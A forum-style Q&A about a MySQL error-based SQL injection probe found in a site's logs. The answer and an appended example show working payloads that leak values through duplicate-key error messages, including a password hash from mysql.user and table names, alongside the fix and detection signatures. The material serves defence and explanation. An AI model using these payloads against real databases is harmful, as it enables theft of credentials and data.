SQL Injection attack - What does this do?

Problem description

I have detected some failed SQL injection attacks on my website. The failed queries are of the form:

SELECT 6106 FROM(SELECT COUNT(*),':sjw:1:ukt:1'x FROM information_schema.tables GROUP BY x)

The ':sjw:1:ukt:1' part is specially constructed with variables concatenated together to give random 0s or 1s etc.

I would like to know what these queries do?

The database is MySQL.

Update: Here is the original injected SQL:

(SELECT 6106
 FROM  (SELECT COUNT(*),
               CONCAT(
                        CHAR(58, 115, 106, 119, 58), 
                        (SELECT ( CASE WHEN ( 6106 = 6106 ) THEN 1 ELSE 0 END )), 
                        CHAR(58, 117, 107, 116, 58), 
                        FLOOR(RAND(0) * 2)
                      ) x
        FROM   INFORMATION_SCHEMA.TABLES
        GROUP  BY x)a) 

It fails with message

Duplicate entry ':sjw:1:ukt:1' for key 'group_key'

Solution

What the attack really does

There is a subtle but clever detail about this attack that other answerers missed. Notice the error message Duplicate entry ':sjw:1:ukt:1' for key 'group_key'. The string :sjw:1:ukt:1 is actually the result of an expression evaluated by your MySQL server. If your application sends the MySQL error string back to the browser, then the error message can leak data from your database.

This kind of attack is used in cases where the query result isn't otherwise sent back to the browser (blind SQL injection), or when a classical UNION SELECT attack is complicated to pull off. It also works in INSERT/UPDATE/DELETE queries.

As Hawili notes, the original particular query wasn't supposed to leak any information; it was just a test to see whether your application is vulnerable to this kind of injection.

Contrary to what MvG suggested, the attack didn't fail: causing this error is the purpose of the query.

A better example of how this may be used:

> SELECT COUNT(*),CONCAT((SELECT CONCAT(user,password) FROM mysql.user LIMIT 1),
>                        0x20, FLOOR(RAND(0)*2)) x
> FROM information_schema.tables GROUP BY x;
ERROR 1062 (23000): Duplicate entry 'root*309B17546BD34849D627A4DE183D3E35CD939E68 1' for key 'group_key'

Why the error is raised

Why the query causes this error in MySQL is somewhat of a mystery for me. It looks like a MySQL bug, since GROUP BY is supposed to deal with duplicate entries by aggregating them. Hawili's simplification of the query doesn't, in fact, cause the error!

The expression FLOOR(RAND(0)*2) gives the following results in order, based on the random seed argument 0:

> SELECT FLOOR(RAND(0)*2)x FROM information_schema.tables;
+---+
| x |
+---+
| 0 |
| 1 |
| 1 | <-- error happens here
| 0 |
| 1 |
| 1 |
 ...

Because the 3rd value is a duplicate of the 2nd, this error is thrown. Any FROM table with at least 3 rows can be used, but information_schema.tables is a common one. The COUNT(*) and GROUP BY parts are necessary to provoke the error in MySQL:

> SELECT COUNT(*),FLOOR(RAND(0)*2)x FROM information_schema.tables GROUP BY x;
ERROR 1062 (23000): Duplicate entry '1' for key 'group_key'

This error doesn't occur in the PostgreSQL-equivalent query:

# SELECT SETSEED(0);
# SELECT COUNT(*),FLOOR(RANDOM()*2)x FROM information_schema.tables GROUP BY x;
 count | x 
-------+---
    83 | 0
    90 | 1

(Sorry about answering 1 year late, but I just stumbled upon this today. This question is interesting to me because I wasn't aware there are ways to leak data via error messages from MySQL)
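The following is an added example and is not code from the question or the answer above. It takes the duplicate-group-key technique the answer describes and shows, in MySQL, the probe reduced to its essentials, the reason the GROUP BY raises ERROR 1062 (the double evaluation of the grouping expression, which is my explanation and not the answerer's), extraction of real values through the error string, and the application-side fix. The `articles` table and the bound `@input` value in the last step are hypothetical; the ':sjw:' / ':ukt:' markers and the 6106 condition are taken from the injected query on the page.

```sql
-- Added example, not code from the original question or answer: the
-- duplicate-group-key technique generalised from the probe to extraction,
-- with the mechanism behind the error and the application-side fix.
-- MySQL syntax throughout; the `articles` table in step 4 is hypothetical.

-- Step 1: the probe as injected, reduced to its essentials. The inner SELECT
-- is a boolean the attacker controls (6106 = 6106 -> 1); CHAR() builds the
-- ':sjw:' and ':ukt:' delimiters so the result can be found in the error text.
SELECT COUNT(*),
       CONCAT(CHAR(58, 115, 106, 119, 58),                        -- ':sjw:'
              (SELECT CASE WHEN (6106 = 6106) THEN 1 ELSE 0 END), -- boolean under test
              CHAR(58, 117, 107, 116, 58),                        -- ':ukt:'
              FLOOR(RAND(0) * 2)) AS x
FROM information_schema.tables
GROUP BY x;
-- ERROR 1062 (23000): Duplicate entry ':sjw:1:ukt:1' for key 'group_key'
-- Change the condition to 6106 = 6107 and the message reads ':sjw:0:ukt:1':
-- one bit per request, delivered through the error string.

-- Step 2: why a GROUP BY raises a duplicate-key error at all. MySQL groups
-- through a temporary table keyed on x, and evaluates x once to look the
-- group up and again when it inserts a group that was not found. RAND(0)
-- advances between those two evaluations, so the key inserted is not the
-- key that was checked. With the seeded sequence 0,1,1,0,1,1,...:
--   row 1: lookup 0 (absent)  -> insert 1
--   row 2: lookup 1 (present) -> count it
--   row 3: lookup 0 (absent)  -> insert 1 -> already there -> ERROR 1062
-- Hence the need for at least 3 rows, the COUNT(*)/GROUP BY, and a seeded
-- RAND(); the answer's simplified query without RAND() cannot collide.
SELECT FLOOR(RAND(0) * 2) AS x FROM information_schema.tables LIMIT 6;
-- 0, 1, 1, 0, 1, 1

-- Step 3: extraction. Any scalar subquery can replace the boolean; its value
-- is echoed inside the error. Walk result sets with LIMIT n,1 and long values
-- with SUBSTRING(), since MySQL truncates long keys in the message. Replace
-- DATABASE() with a quoted schema name if no default database is selected
-- (a NULL inside CONCAT() makes x NULL for every row and no error occurs).
SELECT COUNT(*),
       CONCAT(0x3a,
              (SELECT CONCAT(table_schema, '.', table_name)
                 FROM information_schema.tables
                WHERE table_schema = DATABASE()
                LIMIT 0, 1),                                     -- bump 0 to iterate
              0x3a, FLOOR(RAND(0) * 2)) AS x
FROM information_schema.tables
GROUP BY x;
-- ERROR 1062 (23000): Duplicate entry ':<schema>.<first table>:1' for key 'group_key'

-- Step 4: the fix belongs in the application and has two halves: bind
-- parameters so input is never parsed as SQL, and never return the raw
-- MySQL error to the client (log it server-side, send a generic error), which
-- closes the channel even if another injection slips through. A server-side
-- prepared statement demonstrates the first half; `articles` is hypothetical.
SET @input = '1 AND (SELECT 6106 FROM (SELECT COUNT(*), FLOOR(RAND(0)*2) x FROM information_schema.tables GROUP BY x) a)';
PREPARE stmt FROM 'SELECT id, title FROM articles WHERE id = ?';
EXECUTE stmt USING @input;
-- The string is bound as a value. MySQL coerces it to the number 1 (leading
-- numeric prefix, with a truncation warning) for the comparison; the trailing
-- text is never tokenised as SQL, so no subquery runs and no error is raised.
DEALLOCATE PREPARE stmt;
```

For the defender, the signatures worth hunting in query logs and WAF events are the combination `information_schema.tables ... GROUP BY` with `FLOOR(RAND(0)*2)` and `COUNT(*)`, and application errors containing `for key 'group_key'`; a single such error reaching a client is the probe succeeding, not failing.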
